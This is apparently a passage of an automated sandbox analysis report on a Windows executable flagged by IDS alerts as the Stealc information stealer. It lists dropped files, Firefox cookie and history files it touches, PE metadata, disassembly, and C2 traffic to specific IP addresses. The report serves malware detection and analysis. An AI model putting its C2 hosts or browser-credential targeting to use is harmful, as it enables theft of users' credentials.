                                                                                                                                  SHA-256:FE83A070C5688FFF99CAE7CC6C0552B06C32EC4BD1F141297C2B4E998CC3B688
                                                                                                                                  SHA-512:38F74A41FF7DE38A7FD1BDDC92B7D2C71C96E2C445E458001A633B9C3C803247B3E508F545CF1ACF0DCE3046B3FDDBBDF67841E457722C28B3618199754D40E0
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:........Y.^.'..]ht.L.....~....6n..I...R.xy.?!....>...9W4.$.i...(<.^s3.V.h~#9/Yvo..Q....[......^.z..M...w.........13~......h......W..v.u....E..@'....S....~..`.4M..f"........(.u.l...6....*...^:\.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...*k4...p...G.....................D`......D`kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E...../S..i=.#\In>3(..?..*i...v..x.......s.8`......D`m........8.5...x..2(.U.j...."a.x#.A.....)..hO....F=.x.E..pX....@..N-..|{y.......W=Y...`M.F|....g........... l.n.......2......o.v4.p.m.f.D..f..7.f.Z.?..z.pI7...}.0..O.;....c*..n{..o...=Z...J..n.,.fC.B.r(I..Z.w..c0Z.9,-...~|...cO{.6.. x...P...k...GH...mV~.o........}!....Z|...zi.#...1..p.@.....r).B..q6

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tribute

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):93184
                                                                                                                                  Entropy (8bit):7.997862809019665
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:ly6JuPUpFipOIQXmzEtOdBKF76uTmrZg8HxJlX/I5YQ6BnF7AHCO54yHaOw:ly6JwAi4Ismzs664g81/I5YQ62Ra3
                                                                                                                                  MD5:7A8AE0CF26B3E1C912E1A2A1E4AC5E93
                                                                                                                                  SHA1:61E89AB3EB75A77FAD41EB6A4B398787D1FA32EB
                                                                                                                                  SHA-256:2552FE10A38A8182B874152FC32EAE4886984599E8B18237125E1609ED7254B3
                                                                                                                                  SHA-512:E3B250CDC7CD997E4053D5CE4CDE9C193EA92CE3B7FA970545F12AB55943CBF259A537842971522FCC15E0151495CECAC1E1F9FED7B239D2CA73412004110575
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...I.,..u..... .gh.....x..;t....$..8}.J..6\.....y.fk.b..$vQ..P....k........m.......h.\E$....D.Y:..R.F....:..H...af.P..V*/.S.u..`t......+7.t|.C}...8.~-..Zo..S...s.NT..P.|...K....Q.$...Go.........b.{N.|.3.......UE(.f...t.g...z}..^cTs.1....=i.9..U.e`.2.^..C.U....B>....`S...]J.m..>...L.....].?.?.....a9I)c.-.@..E......y./{Ru........PI%..7.-..lK..k).--)._P......Z.7..<.M.&..:)9_.p.....k..@.Q..Z..k....FS6.Q...P{..R/.. .Cerm.I...1..-u$.......<f}..\..>....2.E....M.V..;.e....=N-..;...4..g..K{..ZD.s9....>.Z......1v..pWb..S[_A.......D/.@OC:.0..5.j.J.l6.l...,.=.@.N..B...f!..G....~*..J.g...a.+...sV1.n.......).t..D...SK?4....&.p...WeO.5"...7D..z..ed.5ym._I]j..k.,..%.....s.zZ.Z.....Nr...- .g.}..~..&].....l..$i..\......?vn..s...`.#..]J...-.h.......7X....+..>....].&1.U.-p..t.c.b..0"=....x3...K.I2...]3..........j..{}.@.>.~.gM..D!..Tzs.3a.}}.Be..*=.k.D5.Z.r..f.....W.7p..3v.:..z....o..o.oCK.?.B_...Lj.....b..NrY..i.C.=..=Y....X...2..........u..j.o..-{.v....

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Zoo

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):10570
                                                                                                                                  Entropy (8bit):7.985024695628925
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:axxW25kBd2O+WPNz7zD0OYmGRieGDZdooWr88KlhTFG8snqeSrPwZUjtafVsH6zo:axxd5k3H7lf0OPNeNr88uFTLenZkh
                                                                                                                                  MD5:94A18A4472D6B8D57BE1AE5B6FA528DE
                                                                                                                                  SHA1:95B8F40D0A98BE0EC7D36E5F84E58637A04F26E2
                                                                                                                                  SHA-256:18C3C349AE6FDCE24970A5D96BAFC2C62DE28C31147D2219915A320338B93289
                                                                                                                                  SHA-512:852B22D8E78E02827104CBF3448E94C37DB0CB348E3C294135C90387DF882A43B329F7066B7D6EBE9030B8EEBA090EDEF3A7EC0BFFE4207299E366FD046B2721
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...+c..T.[..."~...;......f......G3X....<..N{..(.+......C%.P.r....i.i.F....$7u....{]{..;#.....w?.".....<.;..Y.*@%........O... .e}...&.T.".u....Z&...W@..Z.~+X..q?.^.aE.6w...0..np...XP.w.../.G.T.PVP.U......^...rFX<.^.RbC......]...9._C. ...K.bi..(v.Q|...OHCt.s6M.J..i.A.)D....}]C.rU.C.+CKd/...r.....Kd..F0...m....\.D/icz..6.....?*..k8.... .M.8&...t....0..CaB.#&G.z..)3.R..I....i..](.8+.=?.t%.\?.@.C..l;........T|.$....n()....>..U...vH.....A.@*....}....._s7....j.-~]ZE. +....9.FhZQ!.]..!...T............HC.D....b.P.....e.bOd.+....k)...-]..A......:.(n$..Th....?.ty2....4~j.v....[h,....>.....]s.._...U....... .s.C..Cyd....h....4.]R.{%..1i.K.....lXho.....a....y.Kr? .B...T..M..R....u.9N.&...D........#..!...n:.....z.u|...8.g....8....r5..^.pW.:H.5s...eG.6.........U.h%....gO....5..\1..7.I....m.a..[x..f9.'*3n.....e\.S4\P..j...St.&...... ....I...]ON..;.w2d....G$f....}.H%C=JJ.....l\...,.d"$"A...~ls....a....*......E.....;;...iW.......6.....dyOE=O6

                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):32768
                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1248.tmp.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):32768
                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1835008
                                                                                                                                  Entropy (8bit):4.421486597341327
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:+Svfpi6ceLP/9skLmb0OTgWSPHaJG8nAgeMZMMhA2fX4WABlEnN80uhiTw:dvloTgW+EZMM6DFyW03w
                                                                                                                                  MD5:32668BA16FCE19A0AC30895E45091149
                                                                                                                                  SHA1:3D78B6E93DFF179098C1B14F63F74DAA8639EE73
                                                                                                                                  SHA-256:6D74CD9D6542D53DAA5840474B51E08DB44F0D3AAD724205B9B52EE6FB9F1B62
                                                                                                                                  SHA-512:B057F0C21BC40C7C1873198D739F9AA35151783DC316CB692537C1BF89CCBBFC54680E67CF09D579D5DB94F4BCDE9BF34470BA42A389650EE2931D74527B953C
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.TR...................................................................................................................................................................................................................................................................................................................................................E?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  \Device\Null

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):42
                                                                                                                                  Entropy (8bit):4.168886994558424
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:mKzGzjNpmWiAn:PzKmWxn
                                                                                                                                  MD5:A141F2EF139F53C609CFB4A41970C670
                                                                                                                                  SHA1:08F21C8CC66291A834701603B6187916710C5A81
                                                                                                                                  SHA-256:4E998BD6DBBF89EC66340B168B4B23D50CDF6256906AABB8178B2D02237F6CDE
                                                                                                                                  SHA-512:4C5389857D6EDC28910D4B896FEA518BBEC94908682A8AC208C7B9559E02115447F5ED82693F298C2F1DFDC0E160EE14FB06ADAE4B0EEF76B0751E0C7A2C9ADA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..Pinging 2.2.2.2 with 32 bytes of data:..

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Entropy (8bit):7.986046816572704
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:hlyG1m5UmO.exe
                                                                                                                                  File size:1'162'094 bytes
                                                                                                                                  MD5:3ec2504913e8cdf08b76861cd96317d0
                                                                                                                                  SHA1:0f39916a0e4a5c71359c6fb47d871f8eda113258
                                                                                                                                  SHA256:986efaa8bb0469535ddac90dbe8cd3e7cd710e9570e7ff2edda7f82b893baa79
                                                                                                                                  SHA512:d42d9eaaec10eb1bb1136584f41f854b25dbae37644239fd25794a52dde2d5c6018273b507ab970f9a9359db723170b91baf14f7e06d8635b96dbeb3ff2130b1
                                                                                                                                  SSDEEP:24576:YFRdhdjfo7Qk+hX2gQEvumzBchY+pFXBO1wHZLRdDkmh/:2/0F1gjShYwFXBO1wxImN
                                                                                                                                  TLSH:653523206DA9C0EAE4621BF37AB053326E7EF84100B152465618CE8BFF71057D19DBBB
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:c6c3c10f0f4e0d99

                                                                                                                                  Static PE Info

                                                                                                                                  General

                                                                                                                                  Entrypoint:0x403883
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:true
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:5
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:5
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:5
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                  Authenticode Signature

                                                                                                                                  Signature Valid:false
                                                                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                  Error Number:-2146869232
                                                                                                                                  Not Before, Not After
                                                                                                                                  • 09/03/2023 01:00:00 12/03/2025 00:59:59
                                                                                                                                  Subject Chain
                                                                                                                                  • CN="Oracle America, Inc.", O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                                                                                                                  Version:3
                                                                                                                                  Thumbprint MD5:5F429788727974C52EF1B4CD93D03B8F
                                                                                                                                  Thumbprint SHA-1:CD7BE0F00F2A5EE102C3037E098AF3F457D3B1AB
                                                                                                                                  Thumbprint SHA-256:4B59D847D7187ED910590D52798FD7E6FCB13396092FDBC1FE43B2311AAB6EEB
                                                                                                                                  Serial:060E2F8F9E1B8BE518D5FE2B69CFCCB1

                                                                                                                                  Entrypoint Preview

                                                                                                                                  Instruction
                                                                                                                                  sub esp, 000002D4h
                                                                                                                                  push ebx
                                                                                                                                  push ebp
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  push 00000020h
                                                                                                                                  xor ebp, ebp
                                                                                                                                  pop esi
                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                  mov dword ptr [esp+10h], 00409268h
                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                  call dword ptr [00408030h]
                                                                                                                                  push 00008001h
                                                                                                                                  call dword ptr [004080B4h]
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [004082C0h]
                                                                                                                                  push 00000008h
                                                                                                                                  mov dword ptr [00472EB8h], eax
                                                                                                                                  call 00007F1C94D3499Bh
                                                                                                                                  push ebp
                                                                                                                                  push 000002B4h
                                                                                                                                  mov dword ptr [00472DD0h], eax
                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                  push eax
                                                                                                                                  push ebp
                                                                                                                                  push 00409264h
                                                                                                                                  call dword ptr [00408184h]
                                                                                                                                  push 0040924Ch
                                                                                                                                  push 0046ADC0h
                                                                                                                                  call 00007F1C94D3467Dh
                                                                                                                                  call dword ptr [004080B0h]
                                                                                                                                  push eax
                                                                                                                                  mov edi, 004C30A0h
                                                                                                                                  push edi
                                                                                                                                  call 00007F1C94D3466Bh
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408134h]
                                                                                                                                  cmp word ptr [004C30A0h], 0022h
                                                                                                                                  mov dword ptr [00472DD8h], eax
                                                                                                                                  mov eax, edi
                                                                                                                                  jne 00007F1C94D31F6Ah
                                                                                                                                  push 00000022h
                                                                                                                                  pop esi
                                                                                                                                  mov eax, 004C30A2h
                                                                                                                                  push esi
                                                                                                                                  push eax
                                                                                                                                  call 00007F1C94D34341h
                                                                                                                                  push eax
                                                                                                                                  call dword ptr [00408260h]
                                                                                                                                  mov esi, eax
                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                  jmp 00007F1C94D31FF3h
                                                                                                                                  push 00000020h
                                                                                                                                  pop ebx
                                                                                                                                  cmp ax, bx
                                                                                                                                  jne 00007F1C94D31F6Ah
                                                                                                                                  add esi, 02h
                                                                                                                                  cmp word ptr [esi], bx

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xb4c8.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1193060x2868
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0xf40000xb4c80xb600ede2b9ad69485b87f948fa6a2695893dFalse0.9780649038461539data7.936168769205929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .reloc0x1000000xf320x1000251df722a5ac52c24500706dd051ab2cFalse1.002685546875data7.91976807521914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_ICON0xf41900xadc4PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004720798489344
                                                                                                                                  RT_DIALOG0xfef580x100dataEnglishUnited States0.5234375
                                                                                                                                  RT_DIALOG0xff0580x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                  RT_DIALOG0xff1780x60dataEnglishUnited States0.7291666666666666
                                                                                                                                  RT_GROUP_ICON0xff1d80x14dataEnglishUnited States1.15
                                                                                                                                  RT_MANIFEST0xff1f00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-10-10T09:28:40.984824+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549978104.21.56.70443TCP
                                                                                                                                  2024-10-10T09:28:41.831870+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549979176.113.115.3780TCP
                                                                                                                                  2024-10-10T09:28:56.090329+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:28:56.315078+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:28:56.321716+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config162.204.41.17680192.168.2.549980TCP
                                                                                                                                  2024-10-10T09:28:56.552328+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:28:56.559513+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config162.204.41.17680192.168.2.549980TCP
                                                                                                                                  2024-10-10T09:28:57.190119+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:28:57.681346+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:29:01.396513+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:29:02.383693+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:29:02.904764+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:29:03.449961+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:29:05.142380+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:29:05.524683+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.54998062.204.41.17680TCP
                                                                                                                                  2024-10-10T09:29:17.297106+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549981176.113.115.3780TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 10, 2024 09:28:40.155167103 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.155225039 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.155318975 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.166409016 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.166423082 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.639188051 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.639420033 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.698971987 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.699002028 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.700028896 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.700119972 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.702567101 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.743413925 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.984700918 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.984806061 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.984848022 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.984899998 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.984944105 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.985002995 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.988382101 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.988409996 CEST44349978104.21.56.70192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:40.988420010 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:40.988475084 CEST49978443192.168.2.5104.21.56.70
                                                                                                                                  Oct 10, 2024 09:28:41.128133059 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:41.133291006 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:41.133395910 CEST4997980192.168.2.5176.113.115.37
